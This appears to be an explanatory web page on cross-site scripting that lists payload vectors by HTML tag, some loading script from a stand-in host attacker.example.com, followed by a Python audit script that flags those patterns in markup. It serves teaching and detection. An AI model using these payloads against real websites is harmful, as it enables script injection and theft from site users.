What is cross-site scripting?

Cross-site scripting (XSS) is a web vulnerability that lets a malicious hacker introduce (inject) undesired commands into legitimate client-side code (usually JavaScript) executed by a browser on behalf of the web application.

XSS attack vectors

Common HTML elements and attributes used to carry JavaScript in cross-site scripting payloads include:

The <script> tag:
<script src=http://attacker.example.com/xss.js></script>
<script> alert("XSS");</script>
The onload and onerror attributes:
<img src=x onerror=alert("XSS")>
<body onload=alert("XSS")>
The <body> tag attributes:
<body background="javascript:alert('XSS')">
The <img> tag attributes:
<img src="javascript:alert('XSS');">
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">
The <iframe> tag:
<iframe src="http://attacker.example.com/xss.html">
The <input> tag attributes:
<input type="image" src="javascript:alert('XSS');">
The <link> tag:
<link rel="stylesheet" href="javascript:alert('XSS');">
The <table> and <td> tag attributes:
<table background="javascript:alert('XSS')">
<td background="javascript:alert('XSS')">
The <div> tag attributes:
<div style="background-image: url(javascript:alert('XSS'))">
<div style="width: expression(alert('XSS'));">
The <object> tag:
<object type="text/x-scriptlet" data="http://attacker.example.com/xss.html">
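
As an added example (not part of the original page), the Python sketch below audits an HTML fragment for the vector categories listed above, using the standard-library tokenizer. The names `audit`, `VectorAudit`, `URL_ATTRS` and `LOADER_TAGS` are hypothetical, and the code is a review aid for stored or logged markup, not a sanitizer.

```python
from html.parser import HTMLParser

# Attributes from the list above that can carry a URL (assumed audit scope).
URL_ATTRS = {"src", "href", "background", "dynsrc", "lowsrc", "data"}
# Elements from the list above that run or embed external content.
LOADER_TAGS = {"script", "iframe", "object"}


def _scheme(value):
    """Return the URL scheme after dropping whitespace and control characters.
    This over-approximates browser URL parsing, which is acceptable for an audit."""
    cleaned = "".join(ch for ch in value if ch > " ").lower()
    head = cleaned.split(":", 1)
    return head[0] if len(head) == 2 else ""


class VectorAudit(HTMLParser):
    """Collects (tag, reason) findings for one HTML fragment."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases names and decodes character references in values.
        if tag in LOADER_TAGS:
            self.findings.append((tag, "active element"))
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append((tag, f"event handler {name}"))
            elif name in URL_ATTRS and _scheme(value) == "javascript":
                self.findings.append((tag, f"javascript: URL in {name}"))
            elif name == "style":
                css = "".join(value.lower().split())
                if "expression(" in css or "url(javascript:" in css:
                    self.findings.append((tag, "script in style"))


def audit(fragment):
    """Return the list of findings for an HTML fragment (empty if none)."""
    parser = VectorAudit()
    parser.feed(fragment)
    parser.close()
    return parser.findings
```

An empty result only means none of the listed categories matched; output encoding and a vetted sanitizer remain the actual controls.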